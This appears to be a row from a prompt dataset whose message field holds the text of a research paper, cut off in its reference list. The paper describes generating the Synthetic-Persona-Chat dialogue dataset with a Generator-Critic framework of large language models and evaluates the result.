row_id
int64 0
48.4k
| init_message
stringlengths 1
342k
| conversation_hash
stringlengths 32
32
| scores
dict |
|---|---|---|---|
45,682
|
An error occurred while resolving packages:
One or more packages could not be added to the local file system:
com.unity.ai.navigation: undefined == true
A re-import of the project may be required to fix the issue or a manual modification of D:/ProjectUnity/Unity-ZXing-BarQrCodeHandling-main/Packages/manifest.json file.
|
6abf14724716e4a577d6e940fc5fb3e8
|
{
"intermediate": 0.3255056142807007,
"beginner": 0.3475343585014343,
"expert": 0.32696011662483215
}
|
45,683
|
HTML conversions sometimes display errors due to content that did not convert correctly from the source. This paper uses the following packages that are not yet supported by the HTML conversion tool. Feedback on these issues are not necessary; they are known and are being worked on.
failed: inconsolata
failed: turnstile
Authors: achieve the best HTML results from your LaTeX submissions by selecting from this list of supported packages.
License: CC BY 4.0
arXiv:2312.10007v1 [cs.CL] 15 Dec 2023
Faithful Persona-based Conversational Dataset Generation with Large Language Models
Pegah Jandaghi
University of Southern California <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&XiangHai Sheng Google <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&Xinyi Bai Google <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
\ANDJay Pujara
Information Sciences Institute <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS>
&Hakim Sidahmed Google Research <PRESIDIO_ANONYMIZED_EMAIL_ADDRESS> Work done during an internship at Google Inc., Mountain View, USA
Abstract
High-quality conversational datasets are essential for developing AI models that can communicate with users. One way to foster deeper interactions between a chatbot and its user is through personas, aspects of the user’s character that provide insights into their personality, motivations, and behaviors. Training Natural Language Processing (NLP) models on a diverse and comprehensive persona-based dataset can lead to conversational models that create a deeper connection with the user, and maintain their engagement. In this paper, we leverage the power of Large Language Models (LLMs) to create a large, high-quality conversational dataset from a seed dataset. We propose a Generator-Critic architecture framework to expand the initial dataset, while improving the quality of its conversations. The Generator is an LLM prompted to output conversations. The Critic consists of a mixture of expert LLMs that control the quality of the generated conversations. These experts select the best generated conversations, which we then use to improve the Generator. We release Synthetic-Persona-Chat1
1
Dataset available at https://github.com/google-research-datasets/Synthetic-Persona-Chat, consisting of 20k conversations seeded from Persona-Chat Zhang et al. (2018). We evaluate the quality of Synthetic-Persona-Chat and our generation framework on different dimensions through extensive experiments, and observe that the losing rate of Synthetic-Persona-Chat against Persona-Chat during Turing test decreases from 17.2% to 8.8% over three iterations.
1 Introduction
Every person is a story. Systems that interact with people must understand their underlying stories to effectively engage with them. Unfortunately, many existing datasets used for training conversational agents do not sufficiently model their users. Personas - abstract user representations that express the “story” of a person based on their background and preferences - have been widely used for human-centered design in a variety of domains, including marketing, system design, and healthcare Pruitt and Grudin (2003b). Prior persona-based conversational datasets, like Persona-Chat (PC) Zhang et al. (2018), suffer from several limitations, such as small size, static dialogues that cannot easily be updated with new topics, irrelevant utterances, and contradictory persona attributes Wu et al. (2019). In this paper, we propose a novel framework for generating large, dynamic, persona-based conversational datasets that capture the breadth and depth of human experience.
Personas Pruitt and Grudin (2003a); Cooper and Saffo (1999) have been widely used in a variety of domains and applications, including creating narratives for patients and sharing educational messages in healthcare Massey et al. (2021), targeting users in marketing van Pinxteren et al. (2020); Fuglerud et al. (2020), and communicating with workers in management Claus (2019). Conversational agents use personas to generate more interesting and engaging conversations with their users Zhou et al. (2019); Shum et al. (2019).
Creating persona-based datasets is difficult: the process is labor-intensive, the outputs must be updated to reflect current events and new concepts, and there are often quality concerns. Existing persona-based datasets have resulted from labor-intensive data collection processes Zhang et al. (2018); Zhong et al. (2020) involving humans to create or validate personas, create fictional persona-based conversations, and ensure the conversations are coherent. Moreover, even after these datasets are created, it is difficult to update them with the latest topics Lee et al. (2022), such as current events, new concepts, products, or social trends Lazaridou et al. (2021). Finally, existing persona-based datasets do not guarantee faithfulness, a criterion we introduce to describe the alignment between participants’ utterances and their personas.
In this paper, we introduce a new framework for generating large, customized persona-based conversational datasets that uses unsupervised LLMs to reduce human labor, introduces methods to generate, expand, and update personas automatically, and enforces a set of quality criteria including faithfulness to ensure dialogues are human-like. Our persona-based conversational dataset generation framework consists of a three-level pipeline:
1.
User Generation
2.
User Pairing
3.
Conversation Generation
The user generation step takes a set of seed personas, and augments it to create plausible user profiles. The user pairing step matches users to participate in conversations. The conversation generation produces plausible conversations between the selected user pairs. The conversation generation component uses a method similar to self-feedback Madaan et al. (2023) to iteratively improve the quality of generated samples.
We used the proposed framework to create Synthetic-Persona-Chat (SPC), a conversational dataset with 5k user personas, and 20k faithful dialogues. The framework we defined to create this dataset can be reused to define specialized personas, such as user music profiles, etc. to create application-specific datasets.
Our contributions are:
•
We propose an unsupervised approach to generate, and extend specialized personas using LLMs.
•
We introduce and evaluate a framework based on LLMs to evolve a dataset while imposing different objectives on it.
•
We release Synthetic-Persona-Chat, a high-quality, faithful, persona-based conversational dataset useful for several conversational tasks, such as training persona inference models.
2 Definitions
We define the faithful persona-based dialogue generation task. We begin by defining the persona-based dialogue generation task. We then formally define the faithfulness criteria as a desired quality for the generated dialogues. Throughout this section, we use π to refer to persona attributes (individual sentences which, together, form the user persona), U to refer to user profiles, and D to refer to conversations (dialogues).
Persona Attributes We define a user persona attribute as a sentence describing this user. "I like ice cream", "I have two brothers" and "My native language is Tamazight" are all examples of persona attributes. Let Ω be the universal set of persona attributes. Ω contains all natural language descriptions of all tangible features of any person, which is unbounded.
Persona Categories To help organize the vast space of personas, we adopt the approach of Lee et al. (2022) who introduced persona categories. Persona categories are groups of persona attributes that describe the same semantic feature of the user. In our work, we associate each persona category with a corresponding query that can be answered with all persona attributes in that category. For example, job and family situation are persona categories, and corresponding queries might be “What is your occupation?”, and “Do you have a family?”.
Persona Attribute Structure Persona attributes can overlap. For instance, the attribute "I introduced my kids to scuba diving at a young age" overlaps with the attribute "My eldest son goes to elementary school", since both include the "parenthood" feature of the user. Moreover, some persona attributes form a hierarchy, and some persona attributes are specific cases of other attributes.
User Profile We define a user profile as a set of persona attributes that can be used to describe a user. For a realistic user, the persona attributes describing a user profile should not contradict each other, and be consistent. An arbitrary persona attribute set U⊂Ω is a consistent set of persona attribute if, and only if:
∀π1∈U,∄Π2⊂U:(Π2≠∅)∧(Π2→¬π1)
Persona-based Conversation A persona-based conversation D contains utterances such that at least one persona attribute from each user profile can be inferred from it. For example, the persona attribute "I am a parent" can be inferred from the utterance "I just dropped off my son at school". A persona-based conversation model is a generative model that takes a pair of user profiles (U1, U2) as input, and returns a persona-based dialogue D between these two users.
Faithfulness One crucial quality for a persona-based conversation is that it should align with the user profile. Inspired by Daheim et al. (2023) which introduces dialogue system faithfulness to the knowledge contained in relevant documents, we specify the criterion of faithfulness to characterize the alignment between the utterances of a user in a persona-based conversation and their profile. The faithfulness criterion enforces the constraint that the utterances of a user should not decrease the likelihood of their persona. This criterion assumes the existence of both a prior probability of persona attributes, and an inference model for determining the probability of persona attributes conditioned on utterances. Let M be such an inference model, (U1, U2) a pair of user profiles, and D a persona-based conversation between them. To be a faithful conversation based on M, D should not contain any contradicting evidence to the persona attributes of the speakers: passing the conversation D as input to the inference model M should not reduce the inference probability of persona attributes in either of the user profiles U1 or U2. In other words, the probability of any persona attribute in the user profiles based on conversation D should not be less than the probability of that persona attribute without any assumptions. Formally, we call a conversation D faithful with respect to the user profiles U1 and U2, and inference model M if the following condition holds: ∀π∈U1∪U2:PM(π|D)≥PM(π). Where PM(π|D) indicates the probability that M infers the persona π given conversation D. We show examples of faithful, and unfaithful conversations in Figure 1.
Refer to caption
Figure 1: Unfaithful Conversation (Left): Loving steak is negatively correlated with the persona attribute "I am a vegetarian". Faithful Conversation (Right): It introduces no information that contradicts or weakens the user’s profile.
3 Method
In this section, we introduce our method to generate persona-based conversations. We create such conversations with minimum human input, starting from an initial dataset. Our process consists of three steps, as shown in Figure 2: user generation, user pairing, and conversation generation. The first component augments a set of seed persona attributes Π0 into an expanded set of persona attributes Πe, from which it creates user profiles. The second component pairs user profiles as interlocutors of a conversation. The third and final component uses an iterative process to generate high-quality conversations among user profile pairs. We detail each of these components below.
Refer to caption
Figure 2: Dataset Augmentation Pipeline
3.1 User Generation
The User Generation component is split into two sub-components:
1.
Persona Expansion
2.
User Profile Construction
We bootstrap seed persona attributes by using various prompts Brown et al. (2020b) to generate new persona attributes in the Persona Expansion step (Refer to Appendix A.1 for more details on the prompts used). We then create new user profiles by iteratively selecting random user persona attributes from the expanded persona attributes. We employ a Natural Language Inference (NLI) model to ensure the consistency of the constructed user profiles.
3.1.1 Persona Expansion
We propose an unsupervised method to augment a set of seed persona attributes Π0 into a super-set Πe. Unlike previous approaches Lee et al. (2022), our method is independent of human knowledge or intervention, making it capable of creating specialized personas in new domains. We proceed in two steps: query induction, and persona bootstrapping. In the query induction phase, we identify persona categories in Π0, along with associated queries. We then expand these queries into a set Q that also covers unobserved persona categories. The persona bootstrapping step leverages the category-based query set Q, and the initial persona attribute seed set Π0 to generate new persona attributes. Both of these steps are based on the bootstrapping technique Yarowsky (1995), and involve prompting an LLM. We provide a detailed description of these two steps in the following.
Query Induction As described in Section 2, each persona attribute belongs to at least one persona category, and each category is associated with a corresponding query that can be answered with persona attributes in that category. The query induction process initially identifies the queries associated with persona categories in Π0. It then bootstraps queries by feeding them to a prompted LLM to create more queries that are associated with unobserved categories, ultimately creating a query set Q. Including queries associated with unobserved persona categories facilitates the creation of a more diverse set of personas, and increases the scale of augmentation.
The query induction relies on the following assumption:
Assumption Let ℳ be an LLM, and let Γ be the set of all queries associated with all persona categories. If two persona attributes π1 and π2 belong to the same persona category, then there exists a query qℳ∈Γ such that π1 and π2 are ℳ’s output to qℳ.
The persona attributes "I am a doctor" and "I am a truck driver", for instance, both belong to the "job" category, leading to the query "What is your job?". We use an agglomerative clustering method to identify the persona categories in Π0. Let C be an arbitrary persona cluster in Π0. To generate a query for C, we select a random subset of persona attributes in C, and create a prompt using these samples. We employ this strategy to generate queries for all the clusters identified in Π0, and create a set of queries, which we refer to as Q0. Details on the clustering, query induction, together with examples of clusters, persona attributes, and induced queries are available in Appendix A.1. We come up with queries for new, unobserved persona categories by bootstrapping the queries in Q0: starting from Q=Q0, we iteratively sample a set of queries from Q, and create a prompt by concatenating them. We then prompt the LLM to generate a new query, and add it to the query set Q, as shown in Figure 3. We generated a total of |Q|=188 queries. This set of category-specific queries Q is later used to guide the LLM to generate new persona attributes from the specified category. Thus, higher values of |Q| result in greater diversity within the expanded persona attribute set.
Refer to caption
Figure 3: Query Induction Steps
Persona Bootstrapping We use the persona attribute seed set Π0 and category-specific queries Q to generate new persona attributes through a bootstrapping process. We initialize Π to Π0. At every iteration, we randomly select a subset of persona attributes from Π, and create a set of prompts as follows: we first concatenate a set of persona attributes s. For every query q∈Q, we then combine the concatenated samples s, and the query q to create a category-specific persona prompt. This prompt guides the LLM to generate a persona attribute for that persona category. The set of prompts obtained from this process is {sq|q∈Q}. We only add a new persona attribute to the set if its BERT embeddings Devlin et al. (2019) are not too close from existing ones, so as to prevent the addition of duplicates.
Each of these prompts is then fed to the LLM to create a new persona attribute, which is subsequently added to the set of persona attributes Π for the next iteration. We continue this iterative process until we have generated a total of 5k persona attributes. Figure 4 illustrates the persona bootstrapping process. Table 6 in the appendix contains the prompt template used in this component.
Refer to caption
Figure 4: Query-based Persona Bootstrapping Process
3.1.2 User Profile Construction
We build user profiles incrementally by sampling persona attributes from Πe, and adding the eligible ones. A persona attribute is eligible if it adheres to the criteria of consistency and non-redundancy. In other words, it should not contradict any attribute already in the user profile, and it should not be inferred by other persona attribute. We assess the consistency and redundancy of user profiles by leveraging an NLI model, and persona attribute clustering, respectively. The NLI model we employ is based on T5 Raffel et al. (2019), and has been trained on the TRUE dataset Honovich et al. (2022).
We create a user profile U by iteratively selecting a random candidate persona attribute π′∈Πe. We use the NLI model to assess whether π′ contradicts any persona attribute in the profile. This is determined by the condition: ∀π∈U:(π′↛¬π)∧(π↛¬π′), where → is an inference. Additionally, we evaluate the similarity of π′ to the persona attributes in U to prevent the addition of redundant attributes. We add π′ to U if it meets the consistency and non-redundancy criteria. We repeat this process until the user profile contains 5 persona attributes. Please refer to Appendix A.1 for more details on the user profile construction.
3.2 User Pairing
In this component, we identify potential pairs of users for conversations. As the conversations are persona-based, we hypothesize that they will be more engaging if the users’ personas exhibit more commonalities. We assign a similarity score to every pair of user profiles (U1,U2), indicating their semantic similarity. We leverage BERT to represent the user profiles. The similarity between U1 and U2 is defined as: |{(π1,π2)|π1∈U1,π2∈U2,∃c:π1,π2∈c}| Where c is a persona attributes cluster. The semantic similarity is quantified by the number of common persona categories in the user profiles. We pair U1 and U2 if their similarity exceeds a threshold of 2.
3.3 Conversation Generation
Our Conversation Generation component is similar to a general-purpose dataset generation framework that generates data samples, and refines them based on a set of predefined criteria, which we refer to as policies Madaan et al. (2023). The flexibility in the choice of policies for data generation allows us to emphasize different objectives. Once the active policies are selected, this component generates new data samples using a few input samples. The input to our Conversation Generation framework consists of a set of paired user profiles, a few samples of user profiles along with a persona-based conversation between them, and conversation quality metrics as policies. We follow a Generator-Critic architecture, and iteratively create the dataset following the steps shown in Figure 5:
Step 1 The Generator outputs candidate conversations between persona pairs using a few initial conversation samples.
Step 2 The Critic evaluates the candidate conversations based on the predetermined policies, and selects the best candidate conversations.
Step 3 The best candidate conversations are added to the dataset for the next iteration of generation.
This iterative process of selecting the top candidates and adding them to the dataset gradually improves the performance of the Generator.
Without any loss of generality, we implement both the Generator and the Critic based on LLMs. Specifically, the Generator prompts an LLM to create candidate conversations, while the Critic prompts an LLM to evaluate the quality of the generated conversations.
We provide more details on the Generator, Critic, and the policies we used.
Refer to caption
Figure 5: The Generator-Critic Architecture for Conversation Generation
The Generator outputs conversations for pairs of users (U1,U2) by prompting an LLM Brown et al. (2020b); Wei et al. (2023). At each iteration, it randomly selects 5 samples from an initial set of conversations, each containing a pair of user profiles and a dialogue among them. It feeds these samples to a template that instructs the LLM to generate a series of candidate conversations for the given user pair. The template, and a sample generated conversation are available in Table 6, and Table 8 in the appendix.
The Critic selects the best generated conversations to fine-tune the Generator. A conversation is deemed high-quality if it complies with the policies of the Critic. Given the multifaceted nature of the conversation evaluations, we use a Mixture of Experts (MoE) approach. Each expert evaluates the conversation based on a specific policy. In this paper, we incorporate three types of experts, each with distinct criteria: general conversation quality, persona faithfulness, and toxicity. Collectively, these experts select the best generated conversations (the single best in our experiments). We describe each type of expert, and the collective decision-making process below.
General Conversation Quality experts assess conversation quality using the Fine-grained Evaluation of Dialog (FED) metrics introduced in Mehri and Eskénazi (2020). These experts use verbalized forms of the policies from FED as prompts. For instance, the "conversation depth quality expert" transforms the "depth policy" from FED into a prompt like "Which conversation is a deeper conversation between user 1 and user 2?". Our system instructs the LLM to compare each pair of candidate conversations based on these policies, resulting in pairwise comparisons. The list of policies and their baseline performance are presented in Table 5 in Appendix A.2.
The Faithfulness expert ensures the consistency of the generated conversations with the user profiles. It uses an LLM to identify instances of unfaithful conversations. The faithfulness prompt provides the LLM with explicit instructions, user profiles, and human-curated examples of unfaithful conversations.
The Toxicity expert detects any conversation that exhibits harmful traits, including bias and hate.
The Critic filters unfaithful and toxic conversations out. It then selects the best conversations using a majority vote among the General Conversation Quality experts. The selected instances are added to the dataset for the next iteration of the Generator.
4 Evaluation
We evaluate different aspects of our dataset generation framework, and the resulting dataset - referred to as Synthetic-Persona-Chat - which is created using an instruction fine-tuned LLM with 24 billion parameters Chung et al. (2022). We compare Synthetic-Persona-Chat (SPC) against the widely used Persona-Chat (PC) dataset across different dimensions. We begin by evaluating the quality of the personas we generate. We then evaluate SPC using both automatic metrics, and human assessment. We analyze other aspects of SPC, such as toxicity and diversity in appendices B.1 and B.1.
4.1 Evaluation of the Expanded Personas
We evaluate our persona expansion module on two seed datasets: Wikipedia, and Persona-Chat. The Wikipedia personas are created by crawling the 1,000 most active contributors2
2
https://en.wikipedia.org/wiki/Wikipedia:List_of_Wikipedians_by_number_of_edits, and extracting user boxes from their pages. We expand both datasets using our framework, and evaluate the expanded persona attribute sets using automatic metrics. Table 1 compares the original persona sets to the expanded ones on a few dimensions. We observe that our persona expansion increases the number of persona attributes in SPC by 119%, while maintaining the original persona categories and expanding them by 71% compared to the persona attributes in PC. Moreover, the lengths of the new generated persona attributes are 107% longer in SPC, indicating that the new personas exhibit greater detail and specificity. We observe a similar trend when applying our persona expansion to the Wikipedia persona set, with a 108% increase in the number of persona attributes, a 140% increase in persona categories, and a 45% growth in persona attribute lengths. This demonstrates the effectiveness of our method in expanding and diversifying persona sets.
Dataset Persona-Chat Synthetic-Persona-Chat Wikipedia Wikipedia+
# Persona Attributes 4,723 10,371 8768 18,293
# Clusters 323 553 408 986
Inter-cluster Dist 0.836 0.863 0.816 0.85
AVG length 7.65 15.9* 10.45 15.2*
Table 1: Evaluation of the expanded persona sets. The numbers with * indicate the metric value of the newly generated persona attributes to contrast with the initial set.
4.2 Next Utterance Prediction
A persona-based conversation reflects the speaker’s persona explicitly or implicitly. Therefore, we expect the inclusion of information about speaker personas to enhance the performance of next utterance prediction models in such conversations. In this experiment, we assess the impact of incorporating speaker personas as prior information on both ranking, and generative - Transformer based Vaswani et al. (2017) - next utterance prediction models. We create a subset of SPC containing conversations among user pairs included in PC for a fair comparison.
Persona-Chat Synthetic-Persona-Chat
Method Metric None Persona % Change None Persona % Change
IR Baseline hit@1 18.69 36.86 +97 19.37 (19.92) 39.6 (26.23) +104 (+31)
Transformer (Ranker) hit@1 14.24 19.21 +35 9.71 (64.24) 11.74 (68.82) +21 (+7)
Transformer (Generator) hit@1 8.54 6.78 -20 6.89 (41.32) 6.66 (37.35) -3 (-9)
Perplexity 122.5 173.3 +41 1032 (5.24) 1126 (5.73) +9 (+9)
BLUE 0.120 0.094 -21 0.097 (0.289) 0.083 (0.251) -14 (-13)
ROUGE 0.141 0.113 -24 0.123 (0.348) 0.107 (0.309) -13 (-11)
Table 2: Results of the next utterance prediction experiment. Performance of the trained model on the test split of Persona-Chat is represented by the numbers in the table, while the numbers in parentheses indicate results for the test split of Synthetic-Persona-Chat.
We observe (Table 2) that the performance of ranking models increases when personas are given to the models as input for both datasets. Specifically, the Transformer (Ranker) model, known for its ability to capture conversational complexity, exhibits higher performance in SPC when evaluated on the SPC test set compared to the PC test set. However, it demonstrates relatively weaker performance when trained on the PC. This implies that SPC contains more intricate and coherent conversations.
The Transformer (Ranker) trained on SPC achieves a hit@1 of 64.24 on SPC test, 350% higher than PC (14.24). This suggests that the Transformer model can more accurately predict the next utterance in SPC, pointing to a greater coherency in conversations.
The performance of the Information Retrieval (IR) Baseline model is slightly higher for SPC: it rises by 31% when conditioned on user personas, which is lower than 97% improvement in PC. A key contributing factor for the performance improvement of the retrieval-based model (IR Baseline) on PC given the personas, is the participants’ tendency to copy persona words in the conversations, whereas in SPC the personas are more implicitly reflected in the conversations. The implicit reflection of personas in SPC, makes the task more challenging for word based retrieval models, necessitating reasoning that goes beyond word level. However, when the model is trained on SPC and tested on PC, the improvement is as high as when the model is trained on PC, i.e. 104% compared to 97%.
The performance of generative models is low for this task since these models are not trained with the ranking objective. However, the performance difference while the models are conditioned on personas is lower for the model trained on SPC, with a 20% drop for the model trained on PC against 3% drop in the model trained on SPC. The increase in perplexity is 9% in SPC compared to 41% in PC. The lower rate of perplexity increase and performance drop of the model given user personas as input highlights the higher alignment of conversations with personas in SPC.
We also evaluate the performance of the next utterance prediction models when given no user, one user, and both user personas. The results suggest a higher degree of bidirectionality in SPC. We refer the reader to the Appendix B.1 for more details.
4.3 Human Evaluation
We compare the quality of the conversations generated by our framework against those in Persona-Chat. We randomly select 200 conversations from PC, together with their corresponding user pairs, and use our method to generate conversations among the same users. We start by following Gehrmann et al. (2019) in running a human experiment to try and detect AI-generated content. We conduct a Turing test where we present pairs of conversations to humans, and ask them to identify the synthetically generated one. This test is carried out on the generated conversations at the end of each iteration of creating SPC. We repeat the test for conversations generated for new persona pairs, which we refer to as iteration 3*, i.e. we pair each of these conversations with a random conversation from PC. For a robust evaluation, every pair of conversations is annotated by 3 human evaluators, and the majority vote is used as the final annotation. Details of this test are available in Appendix B.2. The results of this experiment can be found in Table 3. We observe that the losing rate of SPC is reduced by 48% from SPC Iter 1 to SPC Iter 3, and dropped below the rate of 10%. Interestingly, 91% of the conversations in SPC, which are synthetically generated, are judged as human-like as the conversations generated by humans. Moreover, conversations generated for new personas (Iteration 3*) are deemed artificial in only 8.04% of cases, showing that SPC is more realistic than PC.
We also evaluate the faithfulness of the generated conversations. For each conversation, we provide annotators with a faithfulness annotation task including the speakers’ persona attributes and distractor persona attribute options as shown in Figure 8. We evaluate faithfulness during 3 iterations of conversation generation for the selected 200 user pairs, and the annotators evaluate the generated conversations for each pair in every iteration. The results show that, while improving the Turing test results, faithfulness of conversations are consistently higher than 75% with at most 3% variation in between iterations, indicating high faithfulness in all iterations.
Finally, we assess the impact of LLM size on the quality of the generated dataset within our framework. We create a variant of SPC using an LLM with 540 billion parameters (LLM2). Table 3 presents human evaluations comparing the smaller LLM in multiple iterations to a single-iteration approach with LLM2. The larger model exhibits a 5% advantage in the Turing test over the first iteration of dataset generation over the smaller model. After two iterations, however, the multi-iteration approach outperforms the first iteration of the bigger model, showing our framework’s capacity for cost-effective, high-quality conversation generation.
Conversation Source Lose Win Tie Faithful
SPC Iter 1 17.2 30.1 52.68 78.5
SPC Iter 2 18.5 49 32.5 80.5
SPC Iter 3 8.8 35.23 55.95 76.6
SPC Iter 3* 8.04 32.66 59.29 N/A
SPC (LLM2) 11.5 39 49.5 N/A
Table 3: Turing Test on 200 Generated Conversations per Iteration: Synthetic-Persona-Chat Outcomes Against Persona-Chat.
5 Related Work
Large Language Models (LLMs) have been used for data augmentation Shin et al. (2021), generation Kim et al. (2023); Dong et al. (2023), and evaluation Zhang et al. (2019); Liu et al. (2023). One of the earliest works in this area Anaby-Tavor et al. (2019) used LLMs to create a large text dataset from a small, labeled one. This idea was followed by Wang et al. (2021); Schick and Schütze (2021) which leveraged LLMs to create datasets without any human data. Kumar et al. (2020) evaluated the performance of different LLMs on the data augmentation task. Several conversational dataset generation methods focused on the structure of the conversational data Dai et al. (2022); Leszczynski et al. (2023); Abbasiantaeb et al. (2023). Mehri et al. (2022) illustrated how Large Language Models (LLMs) can effectively generate synthetic training data for task-oriented dialogue models.
Persona-based conversations have been a popular research topic in NLP Liu et al. (2022). One of the earliest works in this area is Persona-Chat, by Zhang et al. (2018), which proposed the Persona-Chat dataset and evaluation metrics that have become a benchmark for persona-based conversation generation Mazaré et al. (2018). Many subsequent works have used this dataset to train and evaluate their models, including DialoGPT Zhang et al. (2020), BlenderBot Shuster et al. (2022), and PersonaChatGen Lee et al. (2022). PersonaChatGen automated the process of creating persona based conversations of Persona-Chat using LLMs. A challenge in generating synthetic datasets is to ensure the quality of the conversation including data faithfulness, fidelity, diversity, and consistency Li et al. (2016); Lee et al. (2023); Veselovsky et al. (2023); Zhuo et al. (2023); Wang et al. (2023a); Mündler et al. (2023). Several works have focused on creating and using high quality training datasets Welleck et al. (2019), and creating quality filtering components to their conversation dataset generation Lewkowycz et al. (2022). Evaluation of the resulting conversational datasets is also challenging Xu et al. (2021). Wang et al. (2023b) recently introduced the paradigm of interactive evaluation of conversations with LLMs.
6 Conclusion and Future Work
We developed a novel framework for generating high-quality persona-based conversations using LLMs, resulting in the creation of Synthetic-Persona-Chat, comprising 20k conversations. We hope this dataset will support future endeavors in developing persona-aware conversational agents, including the generation of domain-specific multi-session conversations for specialized, task-oriented interactions. While we focused on a persona-based dataset generation task, our Generator-Critic approach can be generalized to other use cases, such as generating other specialized datasets, etc.
Limitations
In this paper, we define an iterative process over LLMs to generate a dataset. Our method requires computational resources, and access to an LLM. The quality of the dataset is bounded by the LLM, since the quality critics are also using the same LLM, and we leave the iterative improvement of our critics as future work. The main limitation of this data generation framework is the inability to generate realistic conversations that do not have high quality, since we assume that both parties are fluent, that the conversation flow is perfectly consistent, and there is no unexpected event (e.g. an interruption by another person, connection loss, etc.) in the middle of the conversation. Another limitation of our method is the difficulty of incorporating less tangible persona traits, such as a sense of humor, or user attributes that require multiple conversation sessions to be reflected.
Ethics Statement
The approach of generating datasets based on some desired objective might be used to create harmful datasets, and train malicious models based on them, such as a biased dataset, or a hateful speech one Hartvigsen et al. (2022). On the other hand, these datasets and models can be used as filters in application tasks.
We used Amazon Mechanical Turk in our human experiments, and followed that platform’s guidelines to protect the rights of human raters. The participation was voluntary, and the raters were informed of their rights at the beginning of the study. The platform implemented security measures to protect them, and prevent the disclosure of any Personal Identifiable Information about them. Furthermore, we offered higher than minimum standard wage compensation to avoid any exploitative practices.
To avoid having any toxic conversation in the final dataset, we also used several tools to remove any potentially toxic conversation. Details about these tools, and example removed samples are available in Appendix B.1.
Acknowledgements
The authors would like to thank Kian Ahrabian, Eric Boxer, Luke Friedman, Iñaki Iturrate, Kathy Meir-Hellstern, Filip Radlinski, and Kexuan Sun for their valuable comments on this manuscript.
References
Abbasiantaeb et al. (2023)
Zahra Abbasiantaeb, Yifei Yuan, E. Kanoulas, and Mohammad Aliannejadi. 2023. Let the llms talk: Simulating human-to-human conversational qa via zero-shot llm-to-llm interactions.
Anaby-Tavor et al. (2019)
Ateret Anaby-Tavor, Boaz Carmeli, Esther Goldbraich, Amir Kantor, George Kour, Segev Shlomov, N. Tepper, and Naama Zwerdling. 2019. Not enough data? deep learning to the rescue! ArXiv, abs/1911.03118.
Bansal and Sharma (2023)
Parikshit Bansal and Amit Sharma. 2023. Large language models as annotators: Enhancing generalization of nlp models at minimal cost. ArXiv, abs/2306.15766.
Blei et al. (2004)
D. M. Blei, T. L. Griffiths, M. I. Jordan, and J. B. Tenenbaum. 2004. Hierarchical topic models and the nested Chinese restaurant process. In Advances in Neural Information Processing Systems 16. MIT Press, Cambridge, MA.
Brown et al. (2020a)
Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, T. J. Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeff Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. 2020a. Language models are few-shot learners. ArXiv, abs/2005.14165.
Brown et al. (2020b)
Tom B. Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel M. Ziegler, Jeffrey Wu, Clemens Winter, Christopher Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. 2020b. Language models are few-shot learners.
Chiang and yi Lee (2023)
Cheng-Han Chiang and Hung yi Lee. 2023. Can large language models be an alternative to human evaluations? In Annual Meeting of the Association for Computational Linguistics.
Chung et al. (2022)
Hyung Won Chung, Le Hou, Shayne Longpre, Barret Zoph, Yi Tay, William Fedus, Yunxuan Li, Xuezhi Wang, <PRESIDIO_ANONYMIZED_PERSON>, Siddhartha Brahma, Albert Webson, Shixiang Shane Gu, Zhuyun Dai, Mirac Suzgun, Xinyun Chen, Aakanksha Chowdhery, Alex Castro-Ros, Marie Pellat, Kevin Robinson, Dasha Valter, Sharan Narang, Gaurav Mishra, Adams Yu, Vincent Zhao, Yanping Huang, Andrew Dai, Hongkun Yu, Slav Petrov, Ed H. Chi, Jeff Dean, Jacob Devlin, Adam Roberts, Denny Zhou, Quoc V. Le, and Jason Wei. 2022. Scaling instruction-finetuned language models.
Claus (2019)
Lisbeth Claus. 2019. Hr disruption—time already to reinvent talent management. BRQ Business Research Quarterly, 22.
Cooper and Saffo (1999)
Alan Cooper and Paul Saffo. 1999. The Inmates Are Running the Asylum. Macmillan Publishing Co., Inc., USA.
Daheim et al. (2023)
Nico Daheim, Nouha Dziri, Mrinmaya Sachan, Iryna Gurevych, and Edoardo M. Ponti. 2023. Elastic weight removal for faithful and abstractive dialogue generation.
Dai et al. (2022)
Zhuyun Dai, Arun Tejasvi Chaganty, Vincent Zhao, Aida Amini, Qazi Mamunur Rashid, Mike Green, and Kelvin Guu. 2022. Dialog inpainting: Turning documents into dialogs. ArXiv, abs/2205.09073.
Devlin et al. (2019)
Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. Bert: Pre-training of deep bidirectional transformers for language understanding. ArXiv, abs/1810.04805.
Dong et al. (2023)
Hanze Dong, Wei Xiong, Deepanshu Goyal, Rui Pan, Shizhe Diao, Jipeng Zhang, Kashun Shum, and T. Zhang. 2023. Raft: Reward ranked finetuning for generative foundation model alignment. ArXiv, abs/2304.06767.
Fu et al. (2023)
Jinlan Fu, See-Kiong Ng, Zhengbao Jiang, and Pengfei Liu. 2023. Gptscore: Evaluate as you desire. ArXiv, abs/2302.04166.
Fuglerud et al. (2020)
Kristin Fuglerud, Trenton Schulz, Astri Janson, and Anne Moen. 2020. Co-creating Persona Scenarios with Diverse Users Enriching Inclusive Design, pages 48–59.
Gehrmann et al. (2019)
Sebastian Gehrmann, Hendrik Strobelt, and Alexander M. Rush. 2019. Gltr: Statistical detection and visualization of generated text. In Annual Meeting of the Association for Computational Linguistics.
Hartvigsen et al. (2022)
